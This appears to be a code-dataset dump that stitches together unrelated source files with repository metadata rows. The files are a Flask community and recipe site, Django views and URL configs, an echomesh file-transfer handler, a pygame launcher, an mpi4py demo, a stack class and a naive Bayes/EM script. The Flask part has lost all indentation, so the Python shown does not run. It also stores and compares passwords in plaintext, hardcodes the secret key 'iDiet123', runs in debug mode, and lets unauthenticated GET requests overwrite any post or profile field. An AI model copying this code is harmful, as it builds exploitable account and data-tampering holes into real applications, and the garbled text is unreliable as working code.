return render_template("community.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template("community.html", admin=adminData)
#Credit to Sugianto
@app.route('/community/announcements', methods=['GET'])
def announcements():
postsA = root.child("announcements").get()
if postsA == None:
noNews = 'There are no current announcements.'
else:
announcements = []
for i in postsA:
postDetail = postsA[i]
user_announcement = postDetail['announcement']
announcements.append(user_announcement)
try:
adminID = session["logged_in_admin"]
adminData = root.child("admins/" + adminID).get()
except KeyError:
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
if postsA == None:
return render_template('announcements.html', noNews=noNews)
else:
return render_template('announcements.html', announcement=announcements)
if postsA == None:
return render_template("announcements.html", noNews=noNews, user=users)
else:
return render_template("announcements.html", announcement=announcements, user=users)
if postsA == None:
return render_template("announcements.html",noNews=noNews, admin=adminData)
else:
return render_template("announcements.html",announcement=announcements, admin=adminData)
@app.route('/community/general')
def general():
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
users = None
posts = root.child("posts").get()
if posts == None:
noPosts = 'There are no current posts.'
if users != None:
return render_template('general.html', generals=noPosts, user=users)
else:
return render_template('general.html', generals=noPosts)
titles = []
for i in posts:
postDetail = posts[i]
user_title = postDetail['title']
titles.append(user_title)
if users != None:
return render_template("general.html", title=titles, user=users)
else:
return render_template("general.html", title=titles)
@app.route('/community/recipes')
def recipes():
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
users = None
postsR = root.child('user_recipes').get()
if postsR == None:
noPostsR = 'There are no current recipes.'
if users != None:
return render_template('recipes.html', recipes=noPostsR, user=users)
else:
return render_template('recipes.html', recipes=noPostsR)
names = []
for i in postsR:
postRDetail = postsR[i]
user_name = postRDetail['name']
names.append(user_name)
if users != None:
return render_template('recipes.html', name=names, user=users)
else:
return render_template('recipes.html', name=names)
@app.route('/community/announcements/<announcement_url>', methods=['GET','POST'])
def append3(announcement_url):
postsA = root.child("announcements").get()
admins = root.child('admins').get()
for i in postsA:
announcement_detail = postsA[i]
if announcement_detail['announcement'] == announcement_url:
posterA = admins[announcement_detail['databaseid']]
announced = announcement_detail['announcement']
contented = announcement_detail['content']
i = i
comments = announcement_detail["comments"]
break
postId = announcement_detail['databaseid']
user = root.child('users').get()
try:
adminID = session["logged_in_admin"]
admin = root.child("admins/" + adminID).get()
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("append3.html",alluser=user, i=i, comments=comments, posterA=posterA, announced=announced, contented=contented, postID=postId)
users = root.child("users/" + userId).get()
return render_template("append3.html",alluser=user, i=i, comments=comments, userID=userId, posterA=posterA, announced=announced, contented=contented, user=users, postID=postId)
return render_template("append3.html",alluser=user, i=i, comments=comments, posterA=posterA, announced=announced, contented=contented, postID=postId, admin=admin)
#@app.route('/community')
#def community():
# try:
# adminID = session["logged_in_admin"]
# except KeyError:
# try:
# userId = session["logged_in"]
# except KeyError:
# return render_template("community.html")
# users = root.child("users/" + userId).get()
# return render_template("community.html", user=users)
# adminData = root.child("admins/" + adminID).get()
# return render_template("community.html", admin=adminData)
@app.route('/addComment3')
def addComment3():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserPostsID = request.args.get("posterAID")
processUserID = request.args.get("userID")
post_db = root.child('announcements/' + processUserPostsID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment,
})
@app.route("/announcementUpdate")
def announcementUpdate():
announcement = request.args.get("announcement")
content = request.args.get("content")
posterA = request.args.get("posterA")
articles = root.child("announcements/" + posterA)
articles.update({
"announcement": announcement,
"content": content,
})
return jsonify()
@app.route('/community/general/<title_url>', methods=['GET','POST'])
def append(title_url):
posts = root.child("posts").get()
user = root.child('users').get()
for i in posts:
user_details = posts[i]
if user_details['title'] == title_url:
poster = user[user_details['databaseid']]
titled = user_details['title']
texted = user_details['text']
i = i
comments = user_details["comments"]
break
postId = user_details['databaseid']
try:
userId = session["logged_in"]
except KeyError:
return render_template("append.html",alluser=user, i=i, comments=comments, poster=poster, titled=titled, texted=texted, postID=postId)
users = root.child("users/" + userId).get()
return render_template("append.html",alluser=user, i=i, comments=comments, userID=userId, poster=poster, titled=titled, texted=texted, user=users, postID=postId)
@app.route('/addComment2')
def addComment2():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserPostsID = request.args.get("posterID")
processUserID = request.args.get("userID")
post_db = root.child('posts/' + processUserPostsID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment
})
return jsonify(True)
@app.route("/generalUpdate")
def generalUpdate():
title = request.args.get("title")
text = request.args.get("text")
poster = request.args.get("poster")
articles = root.child("posts/" + poster)
articles.update({
"title": title,
"text": text,
})
return jsonify()
@app.route('/community/recipes/<name_url>')
def append2(name_url):
postsR = root.child('user_recipes').get()
user = root.child('users').get()
for i in postsR:
user_details = postsR[i]
if user_details['name']== name_url:
posterR = user[user_details['databaseid']]
named = user_details['name']
typed = user_details['type']
prep_timed = user_details['prep_time']
cooking_timed = user_details['cooking_time']
caloried = user_details['calories']
ingrediented = user_details['ingredients']
reciped = user_details['recipes']
i=i
comments = user_details["comments"]
break
postId = user_details['databaseid']
try:
userId = session["logged_in"]
except KeyError:
return render_template('append2.html',alluser=user,i=i, comments=comments, posterR=posterR, named=named, typed=typed, prep_timed=prep_timed, cooking_timed=cooking_timed, caloried=caloried, ingrediented=ingrediented, reciped=reciped, postID=postId)
users = root.child('users/' + userId).get()
return render_template('append2.html',alluser=user,i=i, comments=comments, userID=userId, posterR=posterR, named=named, typed=typed, prep_timed=prep_timed, cooking_timed=cooking_timed, caloried=caloried, ingrediented=ingrediented, reciped=reciped, user=users, postID=postId)
@app.route('/addComment')
def addComment():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserRecipesID = request.args.get("posterRID")
processUserID = request.args.get("userID")
post_db = root.child('user_recipes/' + processUserRecipesID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment
})
return jsonify(True)
@app.route("/recipeUpdate")
def recipeUpdate():
name = request.args.get("name")
type = request.args.get("type")
prep_time = request.args.get("prep_time")
cooking_time = request.args.get("cooking_time")
calorie = request.args.get("calorie")
ingredients = request.args.get("ingredients")
recipe = request.args.get("recipe")
posterR = request.args.get("posterR")
articles = root.child("user_recipes/" + posterR)
articles.update({
"name": name,
"type": type,
"prep_time": prep_time,
"cooking_time": cooking_time,
"calorie": calorie,
"ingredients": ingredients,
"recipe": recipe,
})
return jsonify()
@app.route('/community/general/post', methods=['POST', 'GET'])
def post():
post = Post(request.form)
try:
userId = session["logged_in"]
if request.method == 'POST':
title = post.title.data
text = post.text.data
posts = postObj(title, text)
post_db = root.child('posts')
post_db.push({
'databaseid': userId,
"comments": "",
'title': posts.get_title(),
'text': posts.get_text(),
})
return redirect(url_for("general"))
except KeyError:
return render_template("post.html", post=post)
users = root.child("users/" + userId).get()
return render_template("post.html", post=post, user=users)
@app.route('/community/announcements/post', methods=['POST', 'GET'])
def post_announcements():
postA = Announcement(request.form)
admin = session["logged_in_admin"]
if request.method == 'POST':
announcement = postA.announcement.data
content = postA.content.data
postAs = announcementsObj(announcement, content)
postA_db = root.child('announcements')
postA_db.push({
'databaseid': admin,
"comments": "",
'announcement': postAs.get_announcement(),
'content': postAs.get_content(),
})
return redirect(url_for("announcements"))
return render_template("post_announcements.html", postA=postA, admin=admin)
@app.route('/community/recipes/post_recipe', methods=['POST', 'GET'])
def post_recipe():
postR = User_recipe(request.form)
try:
userId = session["logged_in"]
if request.method == 'POST':
name = postR.name.data
type = postR.type.data
prep_time = postR.prep_time.data
cooking_time = postR.cooking_time.data
calories = postR.calories.data
ingredients = postR.ingredients.data
recipes = postR.recipes.data
postsR = recipeObj(name, type, prep_time,cooking_time, calories, ingredients, recipes)
postR_db = root.child('user_recipes')
postR_db.push({
'databaseid' : userId,
"comments" : "",
'name': postsR.get_name(),
'type': postsR.get_type(),
'prep_time': postsR.get_prep_time(),
'cooking_time': postsR.get_cooking_time(),
'calories': postsR.get_calories(),
'ingredients': postsR.get_ingredients(),
'recipes': postsR.get_recipes(),
})
return redirect(url_for("recipes"))
except KeyError:
return render_template('post_recipe.html', postR=postR)
users = root.child('users/' + userId).get()
return render_template("post_recipe.html", postR=postR, user=users)
@app.route('/community/contactus', methods=['POST', 'GET'])
def contactus():
#code
contact = Contact(request.form)
if request.method == 'POST':
email = contact.email.data
subject = contact.subject.data
message = contact.message.data
contacts = contactObj(email, subject, message)
contact_db = root.child('messages')
contact_db.push({
'email': contacts.get_email(),
'subject': contacts.get_subject(),
'message': contacts.get_message(),
})
return redirect(url_for('contactus'))
#code
try:
userId = session["logged_in"]
except KeyError:
return render_template("contactus.html", contact=contact)
users = root.child("users/" + userId).get()
return render_template("contactus.html", contact=contact, user=users)
@app.route('/community/faq')
def faq():
try:
userId = session["logged_in"]
except KeyError:
return render_template("faq.html")
users = root.child("users/" + userId).get()
return render_template("faq.html", user=users)
#LOGIN
@app.route("/login", methods=["POST","GET"])
def login():
session.pop("logged_in", None)
session.pop("logged_in_admin", None)
form = LoginForm(request.form)
regform = RegisterForm(request.form)
users = root.child("users").get()
admins = root.child("admins").get()
if request.method == "POST" and form.adminlogin.data:
username = form.adminusername.data
password = form.adminpassword.data
for admin in admins:
adminDetail = admins[admin]
if adminDetail["username"] == username and adminDetail["password"] == password:
session["logged_in_admin"] = admin
return redirect(url_for("home"))
error = "Please check your Username and Admin Password given."
return render_template("login.html", form=form, regform=regform, checkuser=users, error=error)
if request.method == "POST" and form.login.data:
username = form.username.data
password = form.password.data
for userid in users:
userDetail = users[userid]
if userDetail["username"] == username and userDetail["password"] == password:
session["logged_in"] = userid
return redirect(url_for('home'))
error="Please check your Username and Password."
return render_template("login.html", form=form, regform=regform, checkuser=users, error=error)
elif request.method == "POST" and regform.register.data:
username = regform.username.data
firstname = regform.firstname.data
lastname = regform.lastname.data
password = regform.password.data
user = RegisterObject(username, firstname, lastname, password)
user_db = root.child("users")
user_db.push({
"username": user.get_username(),
"firstname": user.get_firstname(),
"lastname": user.get_lastname(),
"password": user.get_password(),
"displaypicture": "/static/images/display_pic.png",
"displaypicturecolor": "#FF8C00"
})
return render_template("login.html", form=form, regform=regform, checkuser=users)
return render_template("login.html", form=form, regform=regform, checkuser=users)
#PROFILE
@app.route("/profile", methods=["POST","GET"])
def profile():
try:
proform = ProfileForm(request.form)
userId = session["logged_in"]
users = root.child("users/" + userId).get()
proform.firstname.data = users["firstname"]
proform.lastname.data = users["lastname"]
proform.username.data = users["username"]
if request.method == "POST" and proform.closeacc.data:
root.child("users/" + userId).delete()
return redirect(url_for('login'))
if request.method == "POST" and proform.changepassword.data:
user_db = root.child("users/" + userId)
user_db.update({"password": proform.newpassword.data})
return redirect(url_for('profile'))
return render_template("profile.html", proform=proform, user=users)
except KeyError:
return redirect(url_for("home"))
@app.route("/updatingData")
def update_data():
processProfileValue = request.args.get("value")
processProfileKey = request.args.get("key")
userId = session["logged_in"]
user_db = root.child("users/" + userId)
user_db.update({processProfileKey: processProfileValue})
users = root.child("users/" + userId).get()
return jsonify(users)
@app.route("/checkForSameUsername")
def check_sameUsername():
checkingUsername = request.args.get("checkThis")
users = root.child("users").get()
for i in users:
if users[i]["username"] == checkingUsername:
return jsonify(False)
return jsonify(True)
@app.route("/updateDP")
def update_dp():
processFilePath = request.args.get("filePath")
processColor = request.args.get("color")
userId = session["logged_in"]
user_db = root.child("users/" + userId)
user_db.update({"displaypicture": processFilePath,
"displaypicturecolor": processColor
})
return jsonify()
#OTHERS
@app.route("/privacy")
def privacy():
return render_template("privacy.html")
@app.route("/terms&conditions")
def terms_and_conditions():
return render_template("terms&conditions.html")
if __name__ == "__main__":
app.secret_key = 'iDiet123'
app.run(debug=True)
|
[
"noreply@github.com"
] |
CherryPhil.noreply@github.com
|
63a588b38a021df99626fd7f003cdfbd4f20eaf3
|
83aa3050fe8c3467a9eb6005c5804fbab9497379
|
/search/views.py
|
501daa102802f243c3cc21ac534163fb8804bb64
|
[] |
no_license
|
igorlebovic/Mobile-Order-Placement
|
28e6ab94e5d6359c69997468e290196716addd5a
|
0064c4c96faf9d5a53769d4ec179f9c96bbf1070
|
refs/heads/master
| 2016-08-03T09:35:04.184759
| 2011-03-05T07:22:59
| 2011-03-05T07:22:59
| 1,429,277
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from speeqeweb.search import search
from speeqeweb import settings
from django.utils import simplejson
from django.http import HttpResponse
from django.core import serializers
from speeqeweb.catalog.models import Product
def results(request, template_name="search/results.html"):
""" template for displaying settings.PRODUCTS_PER_PAGE paginated product results """
# get current search phrase
q = request.GET.get('q', '')
# get current page number. Set to 1 is missing or invalid
try:
page = int(request.GET.get('page', 1))
except ValueError:
page = 1
matching = search.products(q).get('products', [])
# generate the pagintor object
paginator = Paginator(matching,
settings.PRODUCTS_PER_PAGE)
try:
results = paginator.page(page).object_list
except (InvalidPage, EmptyPage):
results = paginator.page(1).object_list
search.store(request, q)
page_title = 'Search Results for: ' + q
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
|
[
"igor.lebovic@gmail.com"
] |
igor.lebovic@gmail.com
|
63c864a8581fcfaab43516b76e7ffc89d6f4cace
|
762db71e9bb66ab5821bd91eff7e0fa813f795a0
|
/code/python/echomesh/remote/Transfer.py
|
d7504dc059f9bbdcfba3ac617fd24c7d8a0271ed
|
[
"MIT"
] |
permissive
|
huochaip/echomesh
|
0954d5bca14d58c0d762a5d3db4e6dcd246bf765
|
be668971a687b141660fd2e5635d2fd598992a01
|
refs/heads/master
| 2020-06-17T20:21:47.216434
| 2016-08-16T16:49:56
| 2016-08-16T16:49:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import os.path
import shutil
import six
from echomesh.remote import RemoteRegistry
from echomesh.base import Settings
from echomesh.base import MakeDirs
from echomesh.base import Path
def transfer(_, **data):
backup_directory = os.path.join(Path.data_path(), '.echomesh-xfer')
try:
shutil.rmtree(backup_directory)
except OSError:
pass
directories = data.get('directories', [])
if '' in directories:
directories = os.listdir(Path.data_path())
for directory in directories:
parent = os.path.dirname(os.path.join(backup_directory, directory))
MakeDirs.parent_makedirs(parent)
shutil.move(os.path.join(Path.data_path(), directory), parent)
for f, value in six.iteritems(data.get('files')):
fname = os.path.join(Path.data_path(), f)
MakeDirs.parent_makedirs(fname)
with open(fname, 'w') as o:
o.write(value['contents'])
os.utime(fname, (value['atime'], value['mtime']))
if Settings.get('execution', 'delete_backups_after_transfer'):
try:
shutil.rmtree(backup_directory)
except:
pass
HELP = """transfer: transfer all your files to all the other echomesh nodes.
"""
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
a84676b6ba6ffdf94410ce0eb6e19ab89b6b5c66
|
6aede685b491634442e7113041e3dd33d8e59465
|
/main.py
|
9720641276b0cdef043f423029aabd98c4e023d6
|
[] |
no_license
|
jakubthedeveloper/PoznajmyPygame
|
611297ad375bdd08491c452cff7b292e5d1751ae
|
8b88632f8f0b8d460ea514b27ca37d70bbb3c843
|
refs/heads/master
| 2023-01-06T08:38:27.105261
| 2020-10-31T15:51:00
| 2020-10-31T15:51:00
| 114,876,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import pygame
import game
import menu
from levels import *
pygame.init()
window_caption = "Poznajmy PyGame"
max_display_height = int(pygame.display.Info().current_h * 0.9)
display_size = (1024, min(768, max_display_height))
fullscreen = False
def getLevel(level_name):
return globals()[level_name].Level(pygame)
if __name__ == "__main__":
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.display.set_caption(window_caption)
pygame.display.set_mode(display_size, pygame.FULLSCREEN if fullscreen else 0)
while True:
level_name = menu.Menu().run()
level = getLevel(level_name)
game.Game(level).run()
pygame.quit()
|
[
"jakub.krysakowski@gmail.com"
] |
jakub.krysakowski@gmail.com
|
12c3686889b5f2939251bba96d1dae41d0888969
|
9f412a0a84ecf07193830d5ae90079171a1f7bf6
|
/backend/plain_pond_27687/urls.py
|
4eb6d901ddc72cbc259a6a96609d240f76cc2b4d
|
[] |
no_license
|
crowdbotics-apps/plain-pond-27687
|
1a677c88e259ee68fbb44a7162903e297adbdb7d
|
006d431f84180c9e95b0f70ebcd6df6b52faeb23
|
refs/heads/master
| 2023-05-09T12:44:59.849288
| 2021-06-02T18:49:43
| 2021-06-02T18:49:43
| 373,271,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,223
|
py
|
"""plain_pond_27687 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "Plain Pond"
admin.site.site_title = "Plain Pond Admin Portal"
admin.site.index_title = "Plain Pond Admin"
# swagger
api_info = openapi.Info(
title="Plain Pond API",
default_version="v1",
description="API documentation for Plain Pond App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
urlpatterns += [path("", TemplateView.as_view(template_name='index.html'))]
urlpatterns += [re_path(r"^(?:.*)/?$",
TemplateView.as_view(template_name='index.html'))]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
a487d92d7aa1f17f5cb3a204ee05ef92969e8474
|
edc3be3343f1e95f87f5fa184dccbd2959a2a49d
|
/opt/mpi4py-3.1.1/demo/futures/run_primes.py
|
34dc986523b7ae1d197fc3c09fcb2d25b203e440
|
[] |
no_license
|
JBlaschke/docker-mpich
|
2bdeca1d4006688d55ad8eb9e696c3c6a0adab7b
|
938d0608b02cced4881ec8aba27d24cea0c2319b
|
refs/heads/master
| 2023-08-02T03:38:09.571629
| 2021-09-12T18:58:44
| 2021-09-12T18:58:44
| 405,728,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
from __future__ import print_function
import math
from mpi4py.futures import MPIPoolExecutor
PRIMES = [
112272535095293,
112582705942171,
112272535095293,
115280095190773,
115797848077099,
117450548693743,
993960000099397,
]
def is_prime(n):
if n % 2 == 0:
return False
sqrt_n = int(math.floor(math.sqrt(n)))
for i in range(3, sqrt_n + 1, 2):
if n % i == 0:
return False
return True
def test_primes():
with MPIPoolExecutor(4) as executor:
for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)):
print('%d is prime: %s' % (number, prime))
if __name__ == '__main__':
test_primes()
|
[
"jpblaschke@lbl.gov"
] |
jpblaschke@lbl.gov
|
f9e5d442551f8f212b8868c52d63b8be0505383d
|
4563ae15d16d136d2b18c6bfb9ca148388f3c74c
|
/algorithms/stack.py
|
2c4d7a0842d8a1b87f2ab22a5eaa31398d57540f
|
[] |
no_license
|
EmmanuelSHS/LeetCode
|
47453a8e6f9ce52f2ab917d006ecd90c02bdf094
|
f0d4d581fd0c6ea57fc7fa969677f04c8b076284
|
refs/heads/master
| 2021-01-10T17:11:01.974793
| 2016-12-15T17:39:15
| 2016-12-15T17:39:15
| 44,061,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 991
|
py
|
#!/usr/bin/env python
# coding=utf-8
import copy
class stack:
def __init__(self, list, maxlen):
self.top = len(list) - 1
self.maxlen = maxlen
self.list = copy.deepcopy(list)
def empty(self):
return True if self.top == -1 else False
def push(self, x):
if isinstance(x, int):
if self.top + 2 <= self.maxlen:
self.list.append(x)
self.top += 1
else:
raise "Error: Stack Overflow!"
else:
raise "Error: Only int number is acceptable!"
def pop(self):
if self.top == -1:
raise "Error: Stack Underflow!"
else:
self.top -= 1
return self.list.pop()
def getstack(self):
return self.list
def gettop(self):
return self.top
if __name__ == '__main__':
s = stack([], 10)
print s.getstack()
print s.gettop()
s.push(1); print s.getstack()
print s.pop()
|
[
"clochard93@gmail.com"
] |
clochard93@gmail.com
|
ababa1433d212f092af98106f6265a8723cc3983
|
879095825d8079a10d0bb49670a07a41a04fd78b
|
/OnlineShopping/products/urls.py
|
1430056e7332dd4364b528ade260ad83316277bd
|
[] |
no_license
|
raviteja-peri/OnlineShopping
|
317c3431b9d33e980425d2c552f9a9526bd26a97
|
117c1ee57102864850f1f5938c391756efea929f
|
refs/heads/master
| 2020-07-15T02:36:22.865797
| 2019-08-30T21:40:27
| 2019-08-30T21:40:27
| 205,460,057
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from django.urls import path
from products.views import product_list_by_category,ProductDetail,Search,product_list
app_name='products'
urlpatterns=[
path('',product_list,name='productlist'),
path('category/<slug>/',product_list_by_category,name='products'),
path('search/',Search,name='search'),
path('products/<pk>/',ProductDetail,name='single_product')
]
|
[
"periv@uwindsor.ca"
] |
periv@uwindsor.ca
|
4c9b3c312ed1bff80ca7cc04789ddc6fd171bd8f
|
f45211c864d23f89326271c8ca0ec7b0b53b356a
|
/Naive_Bayesian_EM/k_7_com_features.py
|
ab97488d246066dc1fa7b11670ea5787030a48ef
|
[] |
no_license
|
KEVINYZY1/Model-Alan
|
37d9223680831da5794c121d5738464422b358f8
|
bdb32d0837cddfcd8766525d95c53193a27dc61c
|
refs/heads/master
| 2020-03-30T01:51:23.154586
| 2017-05-19T03:21:01
| 2017-05-19T03:21:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,345
|
py
|
# !/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
from scipy.stats import multivariate_normal
from sklearn.mixture import GMM
#from mpl_toolkits.mplot3d import Axes3D
#import matplotlib as mpl
#import matplotlib.pyplot as plt
from sklearn.cross_validation import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
import random
import math
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
# mpl.rcParams['font.sans-serif'] = [u'SimHei']
# mpl.rcParams['axes.unicode_minus'] = False
K = 7
def pre_deal_data(data1,data2):
# 数据离散化处理
for i in range(len(data1[0])):
a = np.array([x[i] for x in data1]) # 取某一列
sp = np.percentile(a,[x*5 for x in range(21)])
for j in range(len(data1)):
# t = data1[j][i]
flag = 0
for k in range(1,len(sp)):
if(data1[j][i] <= sp[k]):
flag = k
break
# data1[j][i] = k + i*100
data1[j][i] = flag + i*100
for j in range(len(data2)):
# t = data2[j][i]
flag = 0
for k in range(1,len(sp)):
if(data2[j][i] <= sp[k]):
flag = k
break
# data2[j][i] = k + i*100
data2[j][i] = flag + i*100
def change(y_hat, y):
# 聚类结果与真实值结果找对应:例如聚类类别1,可能对应真实类别3
lable = np.array([[0]*(K+1)]*(K+1))
# print(lable.shape)
for i in range(len(y)):
lable[int(y_hat[i])][int(y[i])] += 1
z = [0]*(K+1)
# print(lable)
# tot = 0
for i in range(1,(K+1)):
y_max = 0
num_max = -1
for j in range(1,(K+1)):
if lable[i][j] > num_max:
num_max = lable[i][j]
y_max = j
z[i] = y_max
for i in range(len(y_hat)):
y_hat[i] = z[y_hat[i]]
# 注:数据预处理,将最后一列删掉了
def pre(x_test, phi, pi):
# 使用训练好的模型对测试集进行预测
gamma = np.array([[0.0]*K]*len(x_test))
data = x_test
for i in range(len(data)):
tot = 0.0
for k in range(K):
# gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]+lamda) * (phi[1][k][data[i][1]]+lamda) * (phi[2][k][data[i][2]]+lamda)
gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]) * (phi[1][k][data[i][1]]) * (phi[2][k][data[i][2]])
tot += gamma[i][k]
for k in range(K):
gamma[i][k] /= tot
y_test_hat = [0.0]*len(data)
for i in range(len(data)):
maxc = gamma[i][0]
lable = 0
for k in range(1,K):
if maxc < gamma[i][k]:
maxc = gamma[i][k]
lable = k
y_test_hat[i] = lable + 1
return np.array(y_test_hat)
def print_ans(gamma, phi, pi, data, y, x_test, y_test, n_iter):
# 计算预测结果并打印
y_hat = [0.0]*len(data)
for i in range(len(data)):
maxc = gamma[i][0]
lable = 0
for k in range(1,K):
if maxc < gamma[i][k]:
maxc = gamma[i][k]
lable = k
y_hat[i] = lable + 1
y_hat = np.array(y_hat)
y_test_hat = pre(x_test, phi, pi)
if n_iter % 1 ==0:
x_ = np.c_[data, y_hat.reshape(len(y_hat), 1)]
x_test_ = np.c_[x_test, y_test_hat.reshape(len(y_test_hat), 1)]
# 朴素贝叶斯分类:多项式
multinomialNB(x_,y,x_test_,y_test)
# 朴素贝叶斯分类:高斯分布
gaussianNB(x_,y,x_test_,y_test)
logistic(x_,y,x_test_,y_test)
gmm_deal(x_,y,x_test_,y_test)
change(y_hat, y)
change(y_test_hat, y_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
acc_str = u'EM训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'EM测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def gmm_deal(x,y,x_test,y_test):
gmm = GMM(n_components=7, covariance_type='full', tol=0.0001, n_iter=100, random_state=0)
gmm.fit(x)
y_hat = gmm.predict(x)
y_test_hat = gmm.predict(x_test)
print(np.min(y_test_hat, axis=0))
print(np.max(y_test_hat, axis=0))
change(y_hat, y)
change(y_test_hat, y_test)
# 准确率计算需要改动
# 对聚类结果,每一类别中实际类别占比最多的,就是当前类别取值
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print "GMM:"
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print acc_str
print acc_test_str
def multinomialNB(x,y,x_test,y_test):
# 多项式分布:朴素贝叶斯
#create the Multinomial Naive Bayesian Classifier
clf = MultinomialNB(alpha = 0.01)
clf.fit(x,y);
y_hat = clf.predict(x)
y_test_hat = clf.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("朴素贝叶斯:多项式分布")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def logistic(x,y,x_test,y_test):
classifier = LogisticRegression() # 使用类,参数全是默认的
classifier.fit(x, y) # 训练数据来学习,不需要返回值
y_hat = classifier.predict(x)
y_test_hat = classifier.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("logistic回归:")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def gaussianNB(x,y,x_test,y_test):
# 高斯分布朴素贝叶斯
#create the Multinomial Naive Bayesian Classifier
clf = GaussianNB()
clf.fit(x,y);
y_hat = clf.predict(x)
y_test_hat = clf.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("朴素贝叶斯:高斯分布")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def init_with_bayes(pi, phi, data, y):
# 使用贝叶斯统计信息来初始化EM算法参数: pi / phi
pi = np.array([0.0] * K)
for i in range(len(data)):
pi[int(y[i])-1] += 1
pi = pi/sum(pi)
phi = np.array([[[0.0]*21] *K] *3)
print(phi.shape)
for i in range(3):
for j in range(len(data)):
k = int(data[j][i])
lable = int(y[j])-1
phi[i][lable][k] += 1
for j in range(K):
phi[i][j] = phi[i][j]/sum(phi[i][j])
def EM():
data = np.loadtxt('1.csv', dtype=np.float, delimiter=',', skiprows=1)
# data = data[50000:70000]
print(data.shape)
xx, x, y = np.split(data, [1,4, ], axis=1)
x, x_test, y, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
# gmm_deal(x,y,x_test,y_test)
# 朴素贝叶斯分类:多项式
# multinomialNB(x,y,x_test,y_test)
# 朴素贝叶斯分类:高斯分布
# gaussianNB(x,y,x_test,y_test)
# logistic(x,y,x_test,y_test)
# 预处理,连续数据离散化
pre_deal_data(x,x_test)
# 朴素贝叶斯分类:多项式
# multinomialNB(x,y,x_test,y_test)
# 朴素贝叶斯分类:高斯分布
# gaussianNB(x,y,x_test,y_test)
# logistic(x,y,x_test,y_test)
